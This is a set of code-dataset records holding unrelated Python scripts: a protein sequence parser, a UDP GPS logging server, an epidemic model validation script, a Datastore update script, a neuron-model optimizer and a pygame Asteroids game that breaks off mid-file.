{"seq_id":"86384413","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 13 16:49:57 2019\n\n@author: HYEJEONG\n\"\"\"\nfrom collections import Counter\nfrom mathematics import *\n\n#aminoacid = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\n#structure = ['h', 'e', '_']\n\n\n#symbollist = {'A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y'}\n#statelist = {'h', 'e', '_'}\n\ndef readfile(string):\n    \"\"\"\n    This is a method to determine if the argument is a string representing a numeric value. \n    \"\"\" \n    for kind in (str, str, str): \n        try: \n            kind(string) \n        except (TypeError, ValueError): \n            pass \n        else: \n            return True \n    else: \n        return False \n\ndef lineseq(path): \n    \"\"\"\n    This method separates the string into words to extract symbols and states.\n    \"\"\"\n    allstring = [] \n    with open(path) as f: \n        for line in (line.strip() for line in f): ## split the whole content at once, not line by line \n            fields = line.split() \n            if fields: # non-blank line? \n                if readfile(fields[0]):\n                    allstring += fields\n    return allstring 

def proteinseq(path, dbtype = 1):\n    \"\"\"\n    This is a method for getting a protein set. \n    output = [ [ [ protein1 ], [ protein2 ], [ protein3 ], [ protein4 ], ... 
],\n               [ [ structure1 ], [ structure2 ], [ structure3 ], [ structure4 ], ... ] ]\n    \"\"\" \n    if dbtype == 0:\n        None #FASTA file reading method will be here... To be continued... \n    else:\n        allstring = lineseq(path)\n        protein = []\n        secondstr = [] \n        i = None\n        for j in range(len(allstring)): \n            if allstring[j] == '<>' or allstring[j] == '>':\n                protein_single = []\n                secondstr_single = []\n                i = j+1\n                while i < len(allstring):\n                    if allstring[i] == 'end' or allstring[i] == '<>' or allstring[i] == '' :\n                        protein.append(protein_single)\n                        secondstr.append(secondstr_single)\n                        protein_single = []\n                        secondstr_single = []\n                        break\n                    else: #allstring[i] != '<' or allstring[i] != '>' or allstring[i] != '<>':\n                        protein_single.extend(allstring[i])\n                        secondstr_single.extend(allstring[i+1])\n                        i += 2\n    return protein, secondstr \n\ndef getproteinset(path):\n    proteinset = proteinseq(path) \n    return proteinset \n    \n","sub_path":"final/linux/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"379850519","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n    Author: Jorge A. Toro [jolthgs@gmail.com]\n\"\"\"\n\nimport sys \n#import os\nimport socket\nimport threading\nimport time\n\n\nFILE = '/tmp/gps.log'\n#FILE = 'gps.log'\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 59000\nSIZE = 256\n\n\ndef createFile(arch):\n    \"\"\" \n    Create the log file \n    \"\"\"\n    with open(arch, 'w') as f:\n        if f.tell() == 0: \n            print >> f, 'ID'.center(8), 'IP,Port'.center(24), \\\n                'Date'.center(12), 'Time'.center(10), \\\n                'Event'.center(9), 'Latitude'.center(10), \\\n                'Longitude'.center(12), 'Geocoding'.center(36)\n            print >> f, ('-'*6).ljust(8), ('-'*22).ljust(24), \\\n                ('-'*10).ljust(14), ('-'*8).ljust(10), \\\n                ('-'*6).ljust(6), ('-'*10).ljust(11), \\\n                ('-'*10).ljust(12), ('-'*34).ljust(36) \n    return True\n\n\nclass Device(threading.Thread):\n    \"\"\" \n    GPS devices \n    \"\"\"\n\n    endfile = 0\n\n    def __init__(self, data, address, lock):\n        threading.Thread.__init__(self)\n        self.data, self.address = data, address\n        self.lock = lock\n\n    def run(self):\n        \"\"\"\n        run\n        \"\"\"\n        self.logFile()\n\n\n    def logFile(self):\n        \"\"\"\n        Log file\n        \"\"\"\n        self.lock.acquire(True)\n        with open(FILE, 'a+') as f:\n            f.seek(self.__class__.endfile)\n            #print >> f, f.tell()\n            #print >> f, time.asctime() + ': ' + repr(self.address)\n            print >> f, ('None').ljust(8), \\\n                (repr(self.address)).ljust(26), \\\n                (time.strftime('%D')).ljust(12), \\\n                (time.strftime(\"%H:%M:%S\")).ljust(10), \\\n                ('None').ljust(6), ('None').ljust(11), \\\n                ('None').ljust(12), ('None').ljust(36) \n            #print >> f, self.data\n            self.__class__.endfile = f.tell() \n            #f.close()\n        self.lock.release()\n\n\n\nif __name__ == \"__main__\":\n    #if os.path.exists(FILE) or createFile(FILE):\n    if createFile(FILE):\n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        sock.bind((HOST, PORT))\n\n        lock = threading.Lock()\n\n        print(\"Server %s:%s\" % (HOST, PORT)) \n\n        while 1:\n            try:\n                data, address = sock.recvfrom(SIZE)\n                device = Device(data, address, lock)\n                device.start()\n\n            except KeyboardInterrupt: \n                sys.stderr.write(\"Exit, KeyboardInterrupt\\n\")\n                try:\n                    sock.close()\n                    device.join() # Wait until the thread finishes running\n                                  # before ending the program.\n                except NameError: pass\n\n                break # exit the main loop\n\n    #else:\n        #device.join() \n        #sock.close()\n        #break\n    
\n","sub_path":"BK/gpservid-0.0.3.py","file_name":"gpservid-0.0.3.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613183455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nWhen you use this file from the top directory of the repository with poetry, please run\ncd example; poetry run ./model_validation.py; cd ../\n\"\"\"\n\nimport os\nimport sys\ntry:\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nexcept Exception:\n pass\nfrom pathlib import Path\nimport covsirphy as cs\n\n\ndef main():\n # This script works with version >= 2.18.0-alpha\n print(cs.get_version())\n # Create output directory in example directory\n code_path = Path(__file__)\n output_dir = code_path.with_name(\"output\").joinpath(code_path.stem)\n output_dir.mkdir(exist_ok=True, parents=True)\n filer = cs.Filer(output_dir, numbering=\"01\")\n # Setting\n models = [cs.SIR, cs.SIRD, cs.SIRF]\n step_numbers = list(range(3, 10))\n # Execute validation\n for step_n in step_numbers:\n validator = cs.ModelValidator(tau=1440, n_trials=8, step_n=step_n, seed=2)\n for model in models:\n validator.run(model)\n validator.summary().to_csv(**filer.csv(f\"summary_{step_n}-points\", index=False))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example/model_validation.py","file_name":"model_validation.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611628243","text":"# coding: utf-8\nif __name__=='__main__':\n from google.cloud import datastore\n import json\n import os\n\n credentials_json = './key.json' # BigQuery設定時の鍵へのパス\n os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials_json\n project_id = \"****\"\n\n # クライアントの設定\n client = datastore.Client(project=project_id, namespace=\"Diary\")\n\n with open(\"input.csv\") as f:\n for line in f:\n info = line[:-1].split(',')\n print(info)\n # kindにエンティティ種類名を指定\n key = client.key(\"day_info\", int(info[1]))\n entity = client.get(key)\n entity[info[2]] = str(info[3])\n print(entity)\n client.put(entity)\n\n","sub_path":"diary-js/src/transfer/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"86991163","text":"import numpy as np\n\nfrom bluepyopt.deapext.optimisations import IBEADEAPOptimisation\nfrom bluepyopt.ephys.objectives import WeightedSumObjective, SingletonObjective\nfrom bluepyopt.parameters import Parameter\nfrom bluepyopt.evaluators import Evaluator\n\nfrom neat import NeuronSimTree\n\nimport pickle\n\nfrom channels import channelcollection\nimport utils, data\n\n\n## optimization ################################################################\n# trial run parameter values\nMAX_ITER = 10\nN_OFFSPRING = 2\n# full optimization parameter values\n# MAX_ITER = 100\n# N_OFFSPRING = 100\n################################################################################\n\n\n## model evaluator for optimization ############################################\nclass ModelEvaluator(Evaluator):\n def __init__(self, sim_tree, v_dat,\n loc_soma, loc_dend,\n channel_names=['L'],\n mode='fit'):\n \"\"\"\n if mode is fit, check bounds, if mode is evaluate, dont check bounds\n \"\"\"\n self.sim_tree = sim_tree\n self.channel_names = channel_names\n # injection sites\n self.loc_soma, self.loc_dend = loc_soma, loc_dend\n # params\n 
self.dt, self.dur, self.t_max = data.DT, data.DUR, data.T_MAX\n self.t0, self.t1, self.t2, self.t3 = data.T0, data.T1, data.T2, data.T3\n self.a0, self.a1, self.a2, self.a3 = data.A0, data.A1, data.A2, data.A3\n self.channel_names = channel_names\n\n # constant params\n self.r_a = 113./1e6\n self.g_max = {'L': 20.*1e2, 'L_c': 20.*1e2,\n 'K_ir': 40.*1e2, 'K_m': 40.*1e2, 'K_m35': 40.*1e2,\n 'h_u': 60.*1e2, 'h_HAY': 60.*1e2,\n 'Na_p': 100.*1e2, 'NaP': 100.*1e2}\n # define fit parameters\n self._defineFitObjects(v_dat)\n\n # don't check bounds\n if mode == 'evaluate':\n for p in self.params:\n p.bounds = None\n\n def _defineFitObjects(self, v_dat):\n # fitness evaluator\n features = [utils.VeqFeature(v_dat), utils.VStepFeature(v_dat), utils.TraceFeature(v_dat)]\n self.objectives = [SingletonObjective('V_eq', features[0]),\n SingletonObjective('V_step', features[1]),\n SingletonObjective('V_trace', features[2])]\n # parameters\n self.params = [Parameter('d_c_m', value=0.001, bounds=[0., 0.01]),\n Parameter('c_m_0', value=1., bounds=[0.50, 1.50])]\n for c_name in self.channel_names:\n if c_name == 'K_m' or c_name == 'K_m35' or c_name == 'K_ir':\n params = [Parameter('d_'+c_name, value=-1./200., bounds=[-0.1, 0.]),\n Parameter('g0_'+c_name, value=40.*1e2, bounds=[0., 10000.]),\n Parameter('e_r_'+c_name, value=-85., bounds=[-95.,-80.])]\n elif c_name == 'h_HAY' or c_name == 'h_u':\n params = [Parameter('d_'+c_name, value=1./200., bounds=[0.0, 0.1]),\n Parameter('g0_'+c_name, value=0.0099*1e2, bounds=[0., 10000.]),\n Parameter('e_r_'+c_name, value=-40., bounds=[-50.,-30.])]\n elif c_name == 'Na_p' or c_name == 'NaP':\n params = [Parameter('d_'+c_name, value=0., bounds=[-0.0001, 0.0001]),\n Parameter('g0_'+c_name, value=0.01*1e2, bounds=[0.,10000.]),\n Parameter('e_r_'+c_name, value=50., bounds=[40.,60.])]\n # elif c_name == 'L':\n # params = [Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n # Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n # Parameter('e_0_L', value=-90., bounds=[-100., -50.]),\n # Parameter('e_c_L', value=0., bounds=[-1./15, 1./15])]\n elif c_name == 'L':\n params = [Parameter('d_L', value=1./1000., bounds=[0.0, 0.05]),\n Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n Parameter('e_0_L', value=-90., bounds=[-100., -50.])]\n elif c_name == 'L_c':\n params = [Parameter('d_L_c', value=1./1000., bounds=[0.0, 0.05]),\n Parameter('g0_L_c', value=0.40*1e2, bounds=[0., 300.]),\n Parameter('e_0_L_c', value=-90., bounds=[-100., -50.]),\n Parameter('e_c_L_c', value=0., bounds=[-1./15, 1./15])]\n\n # # original params\n # self.params = [Parameter('d_c_m', value=0.001, bounds=[0., 0.01]),\n # Parameter('c_m_0', value=1., bounds=[0.95, 1.05])]\n # for c_name in self.channel_names:\n # if c_name == 'K_m' or c_name == 'K_m35' or c_name == 'K_ir':\n # params = [Parameter('d_'+c_name, value=-1./100., bounds=[-0.1, 0.]),\n # Parameter('g0_'+c_name, value=40.*1e2, bounds=[0., 10000.]),\n # Parameter('e_r_'+c_name, value=-85., bounds=[-95.,-80.])]\n # elif c_name == 'h_HAY' or c_name == 'h_u':\n # params = [Parameter('d_'+c_name, value=1./100., bounds=[0.0, 0.1]),\n # Parameter('g0_'+c_name, value=0.0099*1e2, bounds=[0., 10000.]),\n # Parameter('e_r_'+c_name, value=-40., bounds=[-50.,-30.])]\n # elif c_name == 'Na_p' or c_name == 'NaP':\n # params = [Parameter('d_'+c_name, value=0., bounds=[-0.0001, 0.0001]),\n # Parameter('g0_'+c_name, value=0.01*1e2, bounds=[0.,10000.]),\n # Parameter('e_r_'+c_name, value=50., bounds=[40.,60.])]\n # # elif c_name == 'L':\n # # params = 
[Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n        # #               Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n        # #               Parameter('e_0_L', value=-90., bounds=[-100., -50.]),\n        # #               Parameter('e_c_L', value=0., bounds=[-1./15, 1./15])]\n        #     elif c_name == 'L':\n        #         params = [Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n        #                   Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n        #                   Parameter('e_0_L', value=-90., bounds=[-100., -50.])]\n        #     elif c_name == 'L_c':\n        #         params = [Parameter('d_L_c', value=1./200., bounds=[0.0, 0.05]),\n        #                   Parameter('g0_L_c', value=0.40*1e2, bounds=[0., 300.]),\n        #                   Parameter('e_0_L_c', value=-90., bounds=[-100., -50.]),\n        #                   Parameter('e_c_L_c', value=0., bounds=[-1./15, 1./15])]\n\n\n            else:\n                warnings.warn('unrecognized ion channel \\'' + c_name + '\\' (choose from ' +\n                              ' '.join(['L', 'K_m', 'K_m35', 'K_ir', 'h_HAY', 'h_u']) +\n                              '), ignoring current channel.')\n                continue\n            self.params.extend(params)\n\n    def evalFitness(self, responses):\n        return [obj.calculate_score(responses) for obj in self.objectives]\n\n    def getParameterValues(self):\n        return [p.value for p in self.params]\n\n    def setParameterValues(self, values):\n        if values is None:\n            values = self.getParameterValues()\n        if isinstance(values, list):\n            for p, v in zip(self.params, values): p.value = v\n        elif isinstance(values, dict):\n            for p in self.params: p.value = values[p.name]\n        else:\n            raise TypeError('``values`` must be `list` or `dict`')\n\n    def getParameterValuesAsDict(self):\n        return {p.name: p.value for p in self.params}\n\n    def toStrParameterValues(self, values=None):\n        rstr = 'Parametervalues =\\n'\n        if values is None:\n            values = [p.value for p in self.params]\n        if isinstance(values, list):\n            for p, v in zip(self.params, values):\n                rstr += ' > ' + p.name + ' = %.5f\\n'%v\n        elif isinstance(values, dict):\n            for p in self.params:\n                rstr += ' > ' + p.name + ' = %.5f\\n'%values[p.name]\n        return rstr\n\n    def toStrFitness(self, responses):\n        fitness = self.evalFitness(responses)\n        rstr = 'Fitness =\\n'\n        for ii, ff in enumerate(fitness):\n            rstr += ' > f_%d = %.5f\\n'%(ii,ff)\n        return rstr\n\n    def getTreeWithParams(self, new_tree=None):\n        ps = self.getParameterValuesAsDict()\n        # set the physiology parameters of this tree\n        sim_tree = self.sim_tree.__copy__(new_tree=new_tree)\n        sim_tree.treetype = 'original'\n        # capacitance\n        c_m_distr = utils.linDistr(ps['c_m_0'], ps['d_c_m'])\n        sim_tree.setPhysiology(c_m_distr, self.r_a)\n        # membrane current parameters\n        for ii, c_name in enumerate(self.channel_names):\n            g_func = utils.expDistr(ps['d_'+c_name], ps['g0_'+c_name], g_max=self.g_max[c_name])\n            if c_name != 'L' and c_name != 'L_c':\n                e_r = ps['e_r_'+c_name]\n                # add the current\n                chan = eval('channelcollection.' 
+ c_name + '()')\n                sim_tree.addCurrent(chan, g_func, e_r)\n            else:\n                if c_name == 'L_c':\n                    e_func = utils.linDistr(ps['e_0_L_c'], ps['e_c_L_c'])\n                else:\n                    e_func = lambda x: ps['e_0_L']\n                # add the current\n                for node in sim_tree:\n                    d2s = sim_tree.pathLength({'node': node.index, 'x': .5}, (1., 0.5))\n                    g_l = g_func(d2s)\n                    e_l = e_func(d2s)\n                    node._addCurrent('L', g_l, e_l)\n\n        return sim_tree\n\n    def runSim(self):\n        '''\n        Format for args:\n        [c_m, r_a] +\n        [d_scale, g_0, g_max] for expDistr for each conductance channel in self.channel_names +\n        [e_0, e_1] for the leak potential\n        '''\n        sim_tree = self.getTreeWithParams()\n        # initialize the simulation\n        sim_tree.setCompTree()\n        sim_tree.treetype = 'computational'\n        sim_tree.initModel(dt=self.dt, t_calibrate=200.)\n        # add Iclamps\n        sim_tree.addIClamp(self.loc_dend, self.a0, self.t0, self.dur)\n        sim_tree.addIClamp(self.loc_dend, self.a1, self.t1, self.dur)\n        sim_tree.addIClamp(self.loc_soma, self.a2, self.t2, self.dur)\n        sim_tree.addIClamp(self.loc_soma, self.a3, self.t3, self.dur)\n        # set recorders\n        sim_tree.storeLocs([self.loc_soma, self.loc_dend], name='rec locs')\n\n        # run simulation\n        res = sim_tree.run(self.t_max, pprint=False)\n\n        sim_tree.deleteModel()\n\n        return res\n\n    def evaluate_with_lists(self, param_values=None):\n        return self.evaluate(param_values)\n\n    def evaluate(self, param_values, pprint=True):\n        self.setParameterValues(values=param_values)\n        res = self.runSim()\n        fitness = self.evalFitness(res['v_m'][:,:-1])\n        if pprint:\n            print('>>> fitness =', fitness)\n            # print '>>> ' + self.toStrParameterValues()\n        return fitness\n\n\nclass AttenuationEvaluator(ModelEvaluator):\n    def __init__(self, sim_tree, f_d2s, f_s2d,\n                 loc_soma, loc_dend, mode='fit'):\n        \"\"\"\n        Only optimizes h-current\n\n        if mode is fit, check bounds, if mode is evaluate, dont check bounds\n        \"\"\"\n        self.sim_tree = sim_tree\n        # injection sites\n        self.loc_soma, self.loc_dend = loc_soma, loc_dend\n        # params\n        self.dt, self.dur, self.t_max = data.DT, data.DUR, data.T_MAX\n        self.t0, self.t1, self.t2, self.t3 = data.T0, data.T1, data.T2, data.T3\n        self.a0, self.a1, self.a2, self.a3 = data.A0, data.A1, data.A2, data.A3\n\n        self.mode = mode\n\n        # define fit parameters\n        self._defineFitObjects(f_d2s, f_s2d)\n\n        # don't check bounds\n        if mode == 'evaluate':\n            for p in self.params:\n                p.bounds = None\n\n    def _defineFitObjects(self, f_d2s, f_s2d):\n        # reference attenuation\n        v_dat = data.DataContainer(with_zd=True)\n        att_f = utils.AttFeature(v_dat)\n        att_ref_d2s = att_f.att_d2s * f_d2s\n        att_ref_s2d = att_f.att_s2d * f_s2d\n        # fitness evaluator\n        features = [utils.AttFeature_(att_ref_d2s, att_ref_s2d, v_dat)]\n        self.objectives = [SingletonObjective('Att', features[0])]\n        # parameters\n        self.params = [\n            Parameter('g_h_0', value=0., bounds=[0.,50000.]),\n            Parameter('g_h_1', value=200., bounds=[0.,50000.]),\n            Parameter('g_h_2', value=2000., bounds=[0.,50000.]),\n            Parameter('g_h_3', value=5000., bounds=[0.,50000.]),\n            Parameter('e_r_h', value=-40., bounds=[-50.,-30.]),\n            Parameter('g_h_b', value=0., bounds=[0.,50000.]),\n        ]\n\n    def _h_distr_func(self, x, ds=[0., 250., 500., 750.]):\n        # piecewise-linear h-conductance profile between the distances in ds\n        ps = self.getParameterValues()\n\n        if x <= ds[1]:\n            d0 = ds[0]; d1 = ds[1]\n            p0 = ps[0]; p1 = ps[1]\n        elif x > ds[1] and x < ds[2]:\n            d0 = ds[1]; d1 = ds[2]\n            p0 = ps[1]; p1 = ps[2]\n        else:\n            d0 = ds[2]; d1 = ds[3]\n            p0 = ps[2]; p1 = ps[3]\n\n        return p0 + (p1 - p0) / (d1 - d0) * (x - d0)\n\n    def getTreeWithParams(self, new_tree=None):\n        ps = self.getParameterValuesAsDict()\n        # set the physiology 
parameters of this tree\n sim_tree = self.sim_tree.__copy__(new_tree=new_tree)\n sim_tree.treetype = 'original'\n # h-current distribution\n h_u = channelcollection.h_u()\n sim_tree.addCurrent(h_u, self._h_distr_func, ps['e_r_h'], node_arg='apical')\n\n sim_tree.addCurrent(h_u, ps['g_h_b'], ps['e_r_h'], node_arg='basal')\n sim_tree.addCurrent(h_u, ps['g_h_b'], ps['e_r_h'], node_arg=[sim_tree[1]])\n\n return sim_tree\n################################################################################\n\n\ndef optimize(evaluator):\n global MAX_ITER, N_OFFSPRING\n\n optimisation = IBEADEAPOptimisation(evaluator=evaluator,\n offspring_size=N_OFFSPRING, map_function=map)\n final_pop, hall_of_fame, logs, hist = optimisation.run(max_ngen=MAX_ITER)\n\n return final_pop, hall_of_fame, logs, hist\n\n\ndef optimizeModel(channel_names=None, zd=False, suffix=''):\n \"\"\"\n Optimizes the morphology equipped with channels in `channel_names` to\n recordings with or without ZD\n\n Parameters\n ----------\n channel_names: list of str\n Choose channel names from from {'L', 'K_m', 'K_m35', 'K_ir', 'h_HAY', 'h_u'}\n zd: bool\n True for data with ZD, false for data without ZD\n \"\"\"\n global MAX_ITER, N_OFFSPRING\n\n if channel_names is None:\n channel_names = ['L', 'K_ir', 'K_m35', 'h_u']\n file_name = utils.getFileName(channel_names, zd, suffix=suffix)\n\n full_tree, red_tree, full_locs, red_locs = data.reduceMorphology()\n sim_tree = red_tree.__copy__(new_tree=NeuronSimTree())\n\n # measured data\n v_dat = data.DataContainer(with_zd=zd)\n model_evaluator = ModelEvaluator(sim_tree, v_dat, red_locs[0], red_locs[1],\n channel_names=channel_names)\n\n final_pop, hall_of_fame, logs, hist = optimize(model_evaluator)\n\n # save hall of fame\n file = open(file_name, 'wb')\n pickle.dump(hall_of_fame, file)\n file.close()\n\n\nif __name__ == \"__main__\":\n optimizeModel(channel_names=['L'], zd=False, suffix='_test')","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"145304203","text":"import pygame\nfrom math import cos,sin,sqrt,radians,atan,pi\nimport random\npygame.init()\n\nclass GUI():\n WHITE = (255,255,255)\n font = pygame.font.SysFont(\"couriernew\",32)\n bx = 700\n by = 100\n\n def __init__(self,gD):\n self.gD = gD\n\n def update(self,ship):\n box = pygame.surface.Surface((self.bx, self.by))\n txt_surf = self.font.render(str(ship.score), True, self.WHITE) # bottom line\n txt_rect = txt_surf.get_rect(center=(75, 40))\n box.blit(txt_surf, txt_rect)\n w,h = ship.oImage.get_size()\n txt_surf = pygame.transform.scale(ship.oImage,(int(w*.5),int(h*.5)))\n for x in range(ship.lives):\n spacing = x*45\n txt_rect = txt_surf.get_rect(center=(75-45+spacing, 90))\n box.blit(txt_surf, txt_rect)\n self.gD.blit(box,(0,0))\n\n def gameOver(self,ship):\n box = pygame.surface.Surface((300,500))\n gO = self.font.render(\"GAME OVER\", True,self.WHITE)\n gO_rect = gO.get_rect(center=(90,90))\n box.blit(gO,gO_rect)\n txt_surf = self.font.render(str(ship.score), True, self.WHITE) # bottom line\n txt_rect = txt_surf.get_rect(center=(90, 200))\n box.blit(txt_surf,txt_rect)\n w,h = self.gD.get_size()\n self.gD.blit(box,(int(w/2)-90,int(h/2)-90-40))\n\n\ndef rot_center(image, angle):\n \"\"\"rotate a Surface, maintaining position.\"\"\"\n #DOES NOT WORK\n\n loc = image.get_rect().center #rot_image is not defined\n rot_sprite = pygame.transform.rotate(image, angle)\n # 
rot_sprite.get_rect().center = loc\n rotRect = rot_sprite.get_rect()\n rotRect.center = loc\n return rot_sprite,rotRect\n\nclass Ship():\n \"\"\"Ship class!\n Holds data on ship:\n angle (degress)\n x_speed\n y_speed\n x (position)\n y (position)\n oImage (img) original\n nImage (img) new\n drift (boolean)\n rect (pygame surface)\n\n \"\"\"\n x_speed = 0\n y_speed = 0\n drift = False\n def __init__(self,x,y,angle,img,gD):\n \"\"\"\n Initliazes with where the ship is facing as the angle\n \"\"\"\n self.startingAngle = angle\n self.angle = angle\n self.startingX = x\n self.startingY = y\n self.x = x\n self.y = y\n self.oImage = img\n self.nImage = img\n self.w,self.h = img.get_size()\n self.gD = gD\n self.rect = img.get_rect()\n self.changex = self.rect.w / 2\n self.changey = self.rect.h / 2\n self.rect.inflate_ip(-self.changex,-self.changey)\n self.rect.center = (self.x,self.y)\n self.score = 0\n self.lives = 3\n self.destroyed = False\n self.extraLives = 1\n def move(self):\n \"\"\"FORWARD!!!\n Moves the ship forward in the direction it's heading (its angle)\n \"\"\"\n self.drift = False\n self.x_speed += cos(radians(self.angle))*.4\n self.y_speed += sin(radians(self.angle))*.4\n # if sqrt(self.x_speed**2+self.y_speed**2) < 10:\n\n def rotate(self,posNeg):\n \"\"\"Rotates ship\"\"\"\n self.nImage,self.rect = rot_center(self.oImage,posNeg*3+(270-self.angle))\n self.changex = self.rect.w / 2\n self.changey = self.rect.h / 2\n self.rect.inflate_ip(-self.changex,-self.changey)\n self.rect.center = (self.x,self.y)\n self.angle -= posNeg*3\n\n def update(self):\n \"\"\"MAGIC\n Does magic and makes the ship work.\n Updates position\n \"\"\"\n if(self.score > 10000 * self.extraLives):\n self.lives += 1\n self.extraLives += 1\n if(self.destroyed):\n self.counter += 1\n if(self.counter == 120):\n self.destroyed = False\n width,height = self.gD.get_size()\n speed = sqrt(self.x_speed**2+self.y_speed**2)\n # print(speed)\n if speed < .08 and self.drift:\n self.drift = False\n self.x_speed = 0\n self.y_speed = 0\n if speed > 10:\n self.x_speed = cos(radians(self.angle))*10\n self.y_speed = sin(radians(self.angle))*10\n if self.drift:\n #theta = atan(self.y_speed/self.x_speed)\n self.x_speed *= .98\n self.y_speed *= .98\n\n self.y += self.y_speed\n self.x += self.x_speed\n\n if(self.x >= width):\n self.x = 0 - self.w\n elif(self.x <= 0 - self.w):\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect.center = (self.x,self.y)\n #self.nImage.center = (self.x,self.y)\n #pygame.draw.rect(self.gD,(255,0,255),self.rect) # display's the ship's hit box in purple (for testing\n self.gD.blit(self.nImage,(self.rect.x - self.changex / 2, self.rect.y - self.changey / 2))\n #pygame.draw.rect(self.gD,(255,0,255),self.rect) # display's the ship's hit box in purple (for testing)\n def shoot(self,AllThings):\n x = self.x + int(5 * cos(self.angle))\n y = self.y + int(5 * sin(self.angle))\n AllThings.Projectiles.addProjectile(x,y,radians(self.angle),\"Ship\")\n def destroy(self):\n self.destroyed = True\n self.lives = self.lives - 1 # right now just a test, need to put something else here\n self.x = self.startingX\n self.y = self.startingY\n self.angle = self.startingAngle\n self.rotate(0)\n self.x_speed = 0\n self.y_speed = 0\n self.counter = 0\nclass Asteroid():\n \"\"\"\n Asteroid Class:\n x - position\n y - position\n speed - speed of asteroid\n direction - direction of asteroid\n image - surface containing picture of asteroid\n gameDisplay - the 
display to put the asteroid on\n w, h - the width and height of the surface\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n self.x = x\n self.y = y\n self.speed = speed\n self.direction = direction\n self.image = pygame.image.load('Asteroid.png').convert()\n self.image.set_colorkey((0,0,0)) # Sets the Asteroids Blackness to be transparent\n self.w, self.h = self.image.get_size() # Gets the Asteroid's width and height\n self.destroyed = False\n self.gameDisplay = gameDisplay\n def update(self):\n \"\"\"\n updates the position of the asteroid and rectangle\n \"\"\"\n if(not self.destroyed): # once the asteroid is destroyed, it will stop redrawing the asteroid\n width, height = self.gameDisplay.get_size() # gets the display's width and length\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the Asteroid's to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n if(self.x >= width): # If the asteroid's coordinate goes outside of the window, set that coordinate to the other side of the map\n self.x = 0 - self.w # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.x <= 0 - self.w): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage)) # The Rect is for the hitbox\n self.gameDisplay.blit(self.image,(self.x,self.y)) # draws the asteroid on the screen\n #pygame.draw.rect(self.gameDisplay,(0,255,0),self.rect) # display's the asteroid's hit box in red (for testing)\nclass LargeAsteroid(Asteroid):\n\n \"\"\"\n subclass of the asteroid, for the starting asteroids\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 2,self.h // 2)) # scales the asteroid to size\n self.w,self.h = self.image.get_size()\n self.shrinkage = 50\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage)) # lessening the hitbox so the corners don't stick out\n self.type = \"Large\"\n def destroy(self):\n \"\"\"\n destroys the asteroid and returns the asteroids that should take it's place.\n \"\"\"\n if(not self.destroyed):\n self.destroyed = True\n MedAster = []\n for i in range(2):\n MedAster.append(MediumAsteroid(self.x,self.y,self.speed*1.5,random.uniform(0,2*pi),self.gameDisplay)) #makes two more medium asteroids in it's place with random directions\n return MedAster\n return []\nclass MediumAsteroid(Asteroid):\n \"\"\"\n subclass of the asteroid, for the second asteroid\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 4,self.h // 4)) # half as big as large asteroid\n self.w,self.h = self.image.get_size()\n self.shrinkage = 25\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.type = \"Medium\"\n def 
